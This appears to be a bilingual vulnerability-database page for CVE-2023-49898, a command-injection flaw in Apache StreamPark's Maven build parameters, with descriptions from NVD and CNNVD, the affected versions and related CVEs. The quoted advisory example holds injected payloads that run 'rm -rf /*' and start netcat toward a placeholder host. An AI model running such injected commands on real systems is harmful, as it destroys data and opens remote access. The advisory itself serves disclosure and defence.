Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-49898— Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

EPSS 1.90% · P83
Get alerts for future matching vulnerabilitiesLog in to subscribe

I. Basic Information for CVE-2023-49898

Vulnerability Information

Have questions about the vulnerability? See if Shenlong's analysis helps!
View Shenlong Deep Dive ↗

Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.

Vulnerability Title
Apache StreamPark (incubating): Authenticated system users could trigger remote command execution
Source: NVD (National Vulnerability Database)
Vulnerability Description
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
Source: NVD (National Vulnerability Database)
CVSS Information
N/A
Source: NVD (National Vulnerability Database)
Vulnerability Type
在命令中使用的特殊元素转义处理不恰当(命令注入)
Source: NVD (National Vulnerability Database)
Vulnerability Title
Apache StreamPark 命令注入漏洞
Source: CNNVD (China National Vulnerability Database)
Vulnerability Description
Apache StreamPark是美国阿帕奇(Apache)基金会的一个流媒体应用程序开发框架。 Apache StreamPark 2.0.0版本至2.1.2之前版本存在命令注入漏洞,该漏洞源于没有对编译参数进行检查,允许攻击者插入命令进行远程命令执行。
Source: CNNVD (China National Vulnerability Database)
CVSS Information
N/A
Source: CNNVD (China National Vulnerability Database)
Vulnerability Type
N/A
Source: CNNVD (China National Vulnerability Database)

Affected Products

VendorProductAffected VersionsCPESubscribe
Apache Software FoundationApache StreamPark (incubating) 2.0.0 ~ 2.1.2 -

II. Public POCs for CVE-2023-49898

#POC DescriptionSource LinkShenlong Link
AI-Generated POCPremium

No public POC found.

Login to generate AI POC

III. Intelligence Information for CVE-2023-49898

登录查看更多情报信息。

Same Patch Batch · Apache Software Foundation · 2023-12-15 · 4 CVEs total

CVE-2023-30867Apache StreamPark (incubating): Authenticated system users could trigger SQL injection vul
CVE-2023-46279Apache Dubbo: Bypass deny serialize list check in Apache Dubbo
CVE-2023-29234Bypass serialize checks in Apache Dubbo

IV. Related Vulnerabilities

V. Comments for CVE-2023-49898

No comments yet


Leave a comment